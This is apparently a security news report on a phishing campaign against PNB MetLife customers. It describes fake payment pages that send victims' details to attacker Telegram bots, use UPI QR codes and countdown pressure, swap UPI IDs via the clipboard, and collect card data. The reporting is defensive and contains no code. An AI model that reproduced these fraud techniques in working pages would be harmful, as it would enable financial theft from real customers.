A sophisticated phishing campaign is targeting PNB MetLife insurance customers, luring them into fake payment gateway pages that steal personal details and redirect them to fraudulent UPI transactions. The scam cleverly exploits the trusted reputation of PNB MetLife by creating convincing mobile-optimized portals that mimic legitimate premium payment services. These malicious pages accept policy numbers and customer details with no backend validation, immediately forwarding captured data to attackers via automated channels. The operation, identified by security researcher Anurag Gawande during threat-hunting activities, signifies an evolution in financial fraud tactics, moving beyond simple credential theft to multi-stage operations involving data exfiltration and payment manipulation.
The phishing operation primarily spreads through SMS messages, though email and social media platforms are also potential distribution channels. Victims are directed to professionally designed interfaces that request basic information such as name, policy number, and mobile number. The critical flaw in these fake pages is their deliberate lack of backend verification, allowing arbitrary values to be entered, thus maintaining the illusion of legitimacy while ensnaring victims further into the fraudulent payment flow. Attackers are deploying these pages rapidly across free hosting platforms, particularly EdgeOne Pages, allowing for quick deployment and rotation of malicious sites.
Stealthy Data Theft Through Telegram Infrastructure
Beneath the seemingly legitimate facade, a sophisticated data exfiltration mechanism operates, powered by the Telegram Bot API. Once victims submit their information, the phishing page silently transmits the captured details directly to attacker-controlled Telegram channels. This real-time data theft occurs invisibly, with hardcoded bot tokens and chat IDs embedded within the page’s JavaScript code. Investigations into the phishing infrastructure revealed multiple Telegram bots and operator accounts coordinating the fraudulent activities. Bots like “pnbmetlifesbot” and “goldenxspy_bot” are used to collect victim submissions, while accounts such as “darkdevil_pnb” and “prabhatspy” are used to monitor and receive the stolen information. The compromised data includes names, policy numbers, and mobile numbers, all transmitted instantly as victims complete each form field.
Following the initial data capture, the phishing page prompts victims to enter payment amounts without any policy validation. Any entered value is accepted before being forwarded to the same Telegram channels. The phishing flow then introduces a sense of urgency through countdown timers and the display of QR codes, pressuring victims to complete UPI payments quickly. The JavaScript dynamically generates UPI payment URIs, rendering them as scannable QR codes that direct funds to attacker-controlled accounts. A particularly concerning tactic involves clipboard abuse. When victims click on payment app buttons like PhonePe or Paytm, the fraudulent UPI ID is silently copied to the device’s clipboard before redirecting to the legitimate payment app. This ensures the attacker’s payment details are ready to be pasted, even if victims bypass the QR code.
Advanced variants of this phishing campaign escalate beyond simple payment fraud to encompass comprehensive banking credential harvesting. These sophisticated templates offer multiple deceptive options, such as “Update Amount,” “Refund Your Amount,” and “Add AutoDebit System,” further solidifying the illusion of legitimate policy servicing. When victims select these options, they are eventually led to pages requesting complete bank account details and debit card information, including card numbers, expiry dates, and CVV codes. All financial credentials submitted through these deceptive pages are exfiltrated via the same Telegram infrastructure, transforming the operation from mere payment fraud into full-scale identity and financial data theft.
The continued proliferation of such sophisticated phishing attacks highlights the persistent threat to consumers engaging in online financial transactions. PNB MetLife, like many financial institutions, likely engages in ongoing efforts to educate its customers about such risks and enhance its own security measures. However, the onus remains on consumers to remain vigilant, scrutinizing URLs carefully and avoiding unsolicited payment requests, especially those originating from SMS or untrusted communication channels. The reliance on legitimate UPI apps as a final step in the fraudulent transaction chain makes detection difficult, underscoring the need for enhanced user awareness and potentially improved fraud detection mechanisms within UPI platforms themselves.